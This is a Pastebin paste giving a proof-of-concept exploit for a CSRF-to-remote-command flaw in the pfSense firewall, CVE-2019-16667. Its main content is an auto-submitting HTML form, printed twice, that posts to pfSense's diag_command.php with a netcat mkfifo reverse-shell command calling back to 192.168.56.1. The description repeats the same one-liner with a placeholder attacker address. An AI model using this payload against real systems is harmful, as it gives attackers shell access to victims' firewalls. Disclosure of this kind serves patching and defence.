API tools faq
paste
Guest User

pfsense CSRF POC (cve-2019-16667)

a guest
Sep 26th, 2019
5,126
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.27 KB | None | 0 0
raw download clone embed print report
  1. github repo :- https://github.com/pfsense/pfsense
  2.  
  3. The pfsense firewall is vulnerable to RCE chained with CSRF as it uses
  4. `csrf magic` library since it allows to tamper the CSRF token values submited when processing the
  5. form requests. Due to this flaw, an attacker can exploit this vulnerability by crafting new page that
  6. contains attakcer's controlled input such as a "reverseshell" (eg: `rm /tmp/f;mkfifo /tmp/f;cat
  7. /tmp/f|/bin/sh -i 2>&1|nc attackerip port >/tmp/f`token value) in the form and entice the victims to click
  8. on the crafted link via social engineering methods. Once the victim clicks on the link (try again button
  9. in this case), attacker can take the lateral control of the victim's machine and malicious actions can be
  10. performed on victim's behalf.
  11.  
  12. <!DOCTYPE html>
  13. <html>
  14. <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
  15. <form id="myForm" action="http://pfsense/diag_command.php" method="POST">
  16. <input type=hidden name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4433 >/tmp/f">
  17. <input type=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4433 >/tmp/f">
  18. <input type=hidden name="dlPath" value="">
  19. <input type=hidden name="txtPHPCommand" value="">
  20. <input type="hidden" name="submit" value="EXEC">
  21. </form>
  22. </body>
  23. </html>
  24.  
  25. Steps to Reproduce :-
  26. Create a malicious page containing the below values and user will be redirected to
  27. https://pfsense/diag_command.php page.
  28. <!DOCTYPE html>
  29. <html>
  30. <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
  31. <form id="myForm" action="http://pfsense/diag_command.php" method="POST">
  32. <input type=hidden name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4433 >/tmp/f">
  33. <input type=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4433 >/tmp/f">
  34. <input type=hidden name="dlPath" value="">
  35. <input type=hidden name="txtPHPCommand" value="">
  36. <input type="hidden" name="submit" value="EXEC">
  37. </form>
  38. </body>
  39. </html>
  40.  
  41. You will be greeted with the message as shown below.
  42.  
  43. Once cliked on the Try again button you will be greeted with reverse shell of the victim.
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!